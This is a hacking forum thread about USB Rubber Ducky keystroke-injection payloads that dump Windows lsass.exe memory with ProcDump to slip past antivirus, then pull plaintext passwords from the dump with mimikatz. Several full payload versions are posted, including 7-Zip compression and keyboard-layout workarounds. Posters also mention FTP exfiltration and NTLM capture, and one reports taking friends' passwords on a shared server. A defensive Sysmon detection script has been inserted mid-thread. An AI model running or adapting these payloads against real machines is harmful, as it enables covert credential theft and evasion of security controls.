[Payload] Memory Dump Windows (recover password) without setting off AV


Here's a version of the Mimikatz password recovery payload that doesn't set off AV. See here for background: https://forums.hak5.org/index.php?/topic/29657-payload-ducky-script-using-mimikatz-to-dump-passwords-from-memory/

This uses the Twin Duck firmware and makes use of the Microsoft Sysinternals utility ProcDump.exe.

While slower, the advantage here is that ProcDump.exe doesn't alarm anti-virus.

Props to @mubix - I based this on his blog post http://www.room362.com/blog/2013/6/7/using-mimikatz-alpha-or-getting-clear-text-passwords-with-a.html

I started a new thread because I'm curious if anyone has ideas on how this could be sped up. With the slow transfer speed of the twin duck and the largish file size of the .dmp (42 MB on my system), would it be possible to save it locally, then "grep" the important (smaller?) bits out before transferring them over?

REM Author: Hak5Darren with the help of:
REM @gentilkiwi, @Mubix, redmeatuk, shutin, DyFukA, Microsoft, Sysinternals
REM
REM Description: "Backup" Windows Passwords without setting off AntiVirus
REM Dumps memory of lsass.exe using Microsoft Sysinternals util ProcDump
REM Passwords can later be extracted using mimikatz.
REM
REM Firmware: Use c_duck_v2.1.hex firmware (Twin Duck) to execute from SD
REM card labeled "DUCKY" and save log file as %COMPUTERNAME%_lsass.dmp
REM Include procdump.exe on root of DUCKY SD card. Download ProcDump from:
REM http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
REM
REM Target: Windows Vista/7/8, Win32/x64

REM *** UAC Bypass ***
DELAY 2000
WINDOWS r
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 500

REM *** Define DUCKY drive as %duck%
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 500

REM *** Execute procdump from SD card and save log file to disk ***
STRING %duck%\procdump.exe -accepteula -ma lsass.exe %duck%\%COMPUTERNAME%_lsass.dmp 
ENTER

REM *** GTFO ***
STRING exit
ENTER

REM *** Post Exploitation ***
REM From your PC copy the %COMPUTERNAME%_lsass.dmp off the DUCKY SD card to a 
REM directory including the version of mimikatz for your target's architecture
REM (NT5 win32, NT5 x64, NT6 win32 or NT6 x64) and run the following commands
REM mimikatz.exe <enter>
REM sekurlsa::minidump %COMPUTERNAME%_lsass.dmp <enter>
REM sekurlsa::logonPasswords full <enter>

I'm also curious if a powershell version could be created using this: https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1


I took a stab at it and the following is what I came up with:

The ducky starts an admin cmd prompt and launches a powershell command that has been base64 encoded so it bypasses the execution policy, and it will dump the lsass process into c:\windows\temp\lsass.dmp. Once that is done it exits that shell (if the shell stays open nothing else can touch that file) and starts a new lower-priv shell just to read the file and dump it to a listening server, also all through powershell.

The code is at https://github.com/b00stfr3ak/ducky_lsass_dump

I plan on combining the scripts I have written into a better menu selection because they use a lot of the same code, but that will come in a week or two.

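Added example, written here for the defender's side and not taken from this thread, from ProcDump, mimikatz, PowerSploit or the Ducky firmware: a small detector for the endpoint telemetry the payloads above leave behind. It reads constructed, tab-separated Key=Value records that stand in for Sysmon Event ID 10 (ProcessAccess) and Event ID 1 (ProcessCreate) exports (the field names follow Sysmon; the record format, the allowlist and every sample line are assumptions made for the demo), flags any process that opens lsass.exe with PROCESS_VM_READ plus a query right (what a minidump needs) unless it is on the allowlist, matches command lines against the ProcDump-on-lsass, DUCKY volume lookup and Start-Process cmd.exe -Verb runAs patterns used in the first post, and decodes PowerShell -EncodedCommand arguments (base64 of UTF-16LE) so the encoded variant from the previous post is inspected in plaintext.

```python
"""Flag lsass memory-dump activity in Sysmon-style endpoint logs.

Added example, not from the forum thread or any tool it names. The log
records are constructed as tab-separated Key=Value pairs standing in for
Sysmon Event ID 1 (ProcessCreate) and Event ID 10 (ProcessAccess); the
field names follow Sysmon, the record format itself is an assumption.
"""
import base64
import re

# Windows process access rights (winnt.h). A minidump needs VM_READ plus a query right.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

# Processes that legitimately open lsass.exe. Assumption: baseline this per environment.
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
}

# Command-line patterns taken from the payloads posted in this thread.
SUSPICIOUS_CMDLINE = [
    ("procdump against lsass", re.compile(r"procdump.*\blsass\b", re.I)),
    ("volume-label lookup for DUCKY", re.compile(r"wmic\s+volume.*findstr.*DUCKY", re.I)),
    ("cmd.exe elevated from powershell",
     re.compile(r"Start-Process\s+cmd(\.exe)?\s+-Verb\s+runAs", re.I)),
]

# PowerShell's -EncodedCommand (and its short forms) carries base64 of UTF-16LE text.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def parse_event(line):
    """Split a tab-separated 'Key=Value' record into a dict (values may contain '=' and spaces)."""
    fields = {}
    for part in line.rstrip("\n").split("\t"):
        key, sep, value = part.partition("=")
        if sep:
            fields[key] = value
    return fields


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None if there is none."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def check_process_access(ev):
    """Event 10: a non-allowlisted process opened lsass.exe with rights that allow reading its memory."""
    if ev.get("EventID") != "10":
        return None
    if not ev.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return None
    granted = int(ev.get("GrantedAccess", "0"), 16)
    can_read = granted & PROCESS_VM_READ and granted & (
        PROCESS_QUERY_INFORMATION | PROCESS_QUERY_LIMITED_INFORMATION)
    if not can_read or ev.get("SourceImage", "").lower() in ALLOWED_SOURCES:
        return None
    return f"lsass memory read by {ev['SourceImage']} (GrantedAccess {ev['GrantedAccess']})"


def check_process_create(ev):
    """Event 1: command lines matching the payloads, including the inside of -EncodedCommand blobs."""
    if ev.get("EventID") != "1":
        return None
    cmd = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    text = cmd if decoded is None else cmd + " " + decoded
    hits = [name for name, rx in SUSPICIOUS_CMDLINE if rx.search(text)]
    if decoded is not None and re.search(r"lsass", decoded, re.I):
        hits.append("encoded PowerShell referencing lsass")
    return ", ".join(hits) or None


def scan(lines):
    """Run both rules over the records; return a list of (line_number, reason)."""
    findings = []
    for n, line in enumerate(lines, 1):
        ev = parse_event(line)
        for rule in (check_process_access, check_process_create):
            reason = rule(ev)
            if reason:
                findings.append((n, reason))
    return findings


# Constructed sample log: one benign lsass open, then the behaviours the payloads produce.
ENCODED_SAMPLE = base64.b64encode("Get-Process lsass | Out-Minidump".encode("utf-16-le")).decode()
SAMPLE_LOG = [
    "\t".join(["EventID=10", r"SourceImage=C:\Windows\System32\csrss.exe",
               r"TargetImage=C:\Windows\System32\lsass.exe", "GrantedAccess=0x1000"]),
    "\t".join(["EventID=1", r"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               "CommandLine=powershell Start-Process cmd.exe -Verb runAs"]),
    "\t".join(["EventID=1", r"Image=C:\Windows\System32\cmd.exe",
               r'CommandLine=C:\Windows\System32\cmd.exe /c wmic volume get driveletter, label | findstr "DUCKY"']),
    "\t".join(["EventID=1", r"Image=E:\procdump.exe",
               r"CommandLine=E:\procdump.exe -accepteula -ma lsass.exe E:\WS01_lsass.dmp"]),
    "\t".join(["EventID=10", r"SourceImage=E:\procdump.exe",
               r"TargetImage=C:\Windows\System32\lsass.exe", "GrantedAccess=0x1FFFFF"]),
    "\t".join(["EventID=1", r"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               "CommandLine=powershell.exe -NoProfile -EncodedCommand " + ENCODED_SAMPLE]),
]

if __name__ == "__main__":
    for n, reason in scan(SAMPLE_LOG):
        print(f"line {n}: {reason}")
```

The allowlist should come from a baseline of which processes open lsass.exe on the fleet rather than from this short list; the Event ID 10 rule is the durable one, since it fires on the access itself regardless of which tool performs the dump, while the command-line patterns only catch the exact invocations posted here. A keyboard device that types a Run-dialog elevation within seconds of being plugged in, and a removable volume labelled DUCKY, are separate signals this script does not cover.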

I had posted a payload a while back here on the forums that made the current user attempt to send an NTLMv2 auth to a remote IP (kind of different, but I figured it warranted a mention). The limitation would be that it only affects the current user and requires a remote server to grab the auth (https://github.com/bwall/BAMF/blob/master/IntegrationQueue/static/cifstrap.py).


I wrote the same thing, but it instead uploads to an FTP server quietly in the background. You may want to make a rule for Windows Firewall with netsh first. Not sure if this would set off AV or not, but you only have to plug the ducky in long enough to write the files and start the process. After uploading it literally deletes itself.

https://forums.hak5.org/index.php?/topic/30160-payload-ftp-lsass-grab/

Are you only interested in doing this through external storage? If not, you may consider using your exfiltration to backup the dump file remotely once it's created.

Also, you can send commands to mimikatz, might look like this (change dmp file name if needed):

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full"

Edited by waddell

To help speed up the transfer speed, you could use a normal flash drive instead of a twin duck. The script will look for any drive labeled "DUCKY", so simply label your normal flash drive to "DUCKY" and either don't use the twin duck firmware or don't label the mass storage drive of the twin duck something else. Then when you run the payload, just make sure your normal flash drive is plugged in first and the drivers for it are loaded. Then you are good to go!


I can't get mimikatz to read the passwords from the dmp file I created from my second computer. It keeps showing the password for the computer I'm on. Here are the steps I took:

mimikatz.exe

sekurlsa::minidump lsass.dmp

privilege::debug

sekurlsa::logonPasswords full

Any help would be great. Thanks

Edit: I found the problem. I'm supposed to use the x64 version under the Alpha directory and not under the root directory. Plus it's in English, which helps a lot.

Edited by parkour86

Anyone know how the lsass.exe file works? I was able to get mine and one of my friends' passwords using the payload on a server we all use, but was unable to get my other friends'. Does lsass somehow erase the password cache after some time? Using PowerShell I was able to tell that lsass.exe has been running since the beginning of August, which is when the server was last rebooted. Thanks.


My duck encoder 2.6 won't encode the "|" symbol correctly. I'm in the UK, but I've also tried the US language as well; when the duck is entering the symbol it displays empty in UK and as a "^" in US. Any help would be great.

That's very odd, as it works fine for me, and I'm temporarily residing in the UK at the moment. Run this through the encoder; it will help me debug your problem.

DELAY 2000
STRING qwertyuiopasdfghjklzxcvbnm
DELAY 500
ENTER
STRING QWERTYUIOPASDFGHJKZXCVBNM
DELAY 500
ENTER
STRING 1234567890-=
DELAY 500
ENTER
STRING !"£$%^&*()_+
DELAY 500
ENTER
STRING `[];'#,./
DELAY 500
ENTER 
STRING ~{}:@~|<>? \ |
DELAY 500
ENTER 
STRING €
ENTER

I am also in the UK and just ran that using duck encoder 2.6 with -l uk

qwertyuiopasdfghjklzxcvbnm
QWERTYUIOPASDFGHJKZXCVBNM
1234567890-=
!"$%^&*()_+
`[];,./
~{}:@~<>?  
€

It appears that several symbols don't show up.

Edited by tom564

Aah, when you use -l uk, you're using the built-in language map, which may be slightly older.

Update the SVN repository and try:

java -jar encoder.jar -l resources\gb.properties -i input.txt -o inject.bin

I've changed some of the country codes to ISO-3166-1 to avoid confusion as the Ducky hits worldwide (UK is Ukraine); GB is Great Britain following ISO-3166-1 compliance.

Otherwise the new gb.properties file can be downloaded from here: gb.properties

Edited by midnitesnake

Thanks, it now works fine for me.


Some helpful comments from YouTube regarding this script:

Put 7-Zip (7za.exe) on the duck, execute it (it will not be picked up by antivirus for sure) and then copy the compressed file to the duck. I expect those dumps to compress pretty well ;-)

Using 7-Zip max compression gets the size down to 10 MB, so it will reduce the time by 1/3.

This seems to be working the best for me. I've got it down to about 1:10 on my computer. The 7z format works the best as far as speed and size. Not really sure what else can be done. Any ideas?

REM Author: Hak5Darren with the help of:
REM @gentilkiwi, @Mubix, redmeatuk, shutin, DyFukA, Microsoft, Sysinternals, 7zip
REM
REM Description: "Backup" Windows Passwords without setting off AntiVirus
REM Dumps memory of lsass.exe using Microsoft Sysinternals util ProcDump
REM Passwords can later be extracted using mimikatz.
REM
REM Firmware: Use c_duck_v2.1.hex firmware (Twin Duck) to execute from SD
REM card labeled "DUCKY" and save log file as %COMPUTERNAME%_lsass.dmp
REM Include procdump.exe on root of DUCKY SD card. Download ProcDump from:
REM http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
REM
REM Include 7za.exe on root of DUCKY SD card. Download 7zip command line version from:
REM http://www.7-zip.org/download.html
REM
REM Target: Windows Vista/7/8, Win32/x64

REM *** UAC Bypass ***
DELAY 2000
WINDOWS r
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 500

REM *** Define DUCKY drive as %duck%
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 500

REM *** Execute procdump from SD card, Save dump to %temp%, Compress dump with 7zip from SD card, Send archive to SD card, Delete dump from %temp%, Exit ***
STRING %duck%\procdump.exe -accepteula -ma lsass.exe %temp%\%COMPUTERNAME%_lsass.dmp & %duck%\7za.exe a -t7z -mx9 "%duck%\%COMPUTERNAME%_lsass.7z" "%temp%\%COMPUTERNAME%_lsass.dmp" & del %temp%\%COMPUTERNAME%_lsass.dmp & exit
ENTER

REM *** Post Exploitation ***
REM From your PC copy the %COMPUTERNAME%_lsass.7z off the DUCKY SD card, extract the
REM %COMPUTERNAME%_lsass.dmp into a directory including the version of mimikatz for your
REM target's architecture (NT5 win32, NT5 x64, NT6 win32 or NT6 x64) and run the following commands
REM mimikatz.exe <enter>
REM sekurlsa::minidump %COMPUTERNAME%_lsass.dmp <enter>
REM sekurlsa::logonPasswords full <enter>
Edited by DyFukA

I had problems with Norwegian keyboards and the ^ key, so I made some changes in the code to make it work in Norwegian.

First I tried fixing no.properties for //ASCII_5E = CIRCUMFLEX_BITS, MODIFIERKEY_SHIFT + KEY_SPACE; that did not work for me.

Instead of using no.properties I use the US standard and make the computer change from Norwegian to US English.

Have tested this on my Norwegian Windows 7 x64; it worked perfectly for me :)

Probably the way to go instead of dk.properties and se.properties too?

Check out my modified code:

REM Author: Hak5Darren with the help of:
REM @gentilkiwi, @Mubix, redmeatuk, shutin, DyFukA, Microsoft, Sysinternals, 7zip
REM
REM Modified to circumvent norwegian keyboards by Hackman1970
REM
REM Description: "Backup" Windows Passwords without setting off AntiVirus
REM Dumps memory of lsass.exe using Microsoft Sysinternals util ProcDump
REM Passwords can later be extracted using mimikatz.
REM
REM Firmware: Use c_duck_v2.1.hex firmware (Twin Duck) to execute from SD
REM card labeled "DUCKY" and save log file as %COMPUTERNAME%_lsass.dmp
REM Include procdump.exe on root of DUCKY SD card. Download ProcDump from:
REM http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
REM
REM Include 7za.exe on root of DUCKY SD card. Download 7zip command line version from:
REM http://www.7-zip.org/download.html
REM
REM Target: Windows Vista/7/8, Win32/x64

REM *** UAC Bypass ***
DELAY 2000
WINDOWS r
REM *** Input Language Swap to circumvent problems with Norwegian
REM *** Norwegian Windows 7 used to have US English as second language installed by default
REM *** Using shortcut ALT-SHIFT to toggle between NO and US
ALT-SHIFT
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 500

REM *** For Norwegian I tried to change y[es] to j[a]
REM ALT y
REM ALT j 
REM *** The above did not work but LEFTARROW ENTER works :)
LEFTARROW
ENTER
DELAY 500

REM *** Swap Input Language again for cmd.exe shell
ALT-SHIFT 
DELAY 200

REM *** Define DUCKY drive as %duck%
ENTER
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 500

REM *** Execute procdump from SD card, Save dump to %temp%, Compress dump with 7zip from SD card, Send archive to SD card, Delete dump from %temp%, Exit ***
STRING %duck%\procdump.exe -accepteula -ma lsass.exe %temp%\%COMPUTERNAME%_lsass.dmp & %duck%\7za.exe a -t7z -mx9 "%duck%\%COMPUTERNAME%_lsass.7z" "%temp%\%COMPUTERNAME%_lsass.dmp" & del %temp%\%COMPUTERNAME%_lsass.dmp & exit
ENTER

REM *** Swap Input Language again, hopefully back to Norwegian
ALT-SHIFT 


REM *** Post Exploitation ***
REM From your PC copy the %COMPUTERNAME%_lsass.7z off the DUCKY SD card, extract the
REM %COMPUTERNAME%_lsass.dmp into a directory including the version of mimikatz for your
REM target's architecture (NT5 win32, NT5 x64, NT6 win32 or NT6 x64) and run the following commands
REM (I had to use the one from \mimikatz\alpha\x64 for my Windows 7 x64 box:)
REM mimikatz.exe <enter>
REM sekurlsa::minidump %COMPUTERNAME%_lsass.dmp <enter>
REM sekurlsa::logonPasswords full <enter>

Is this the way to go, or does anyone have a fix for no.properties? :rolleyes:

Edited by Hackman1970
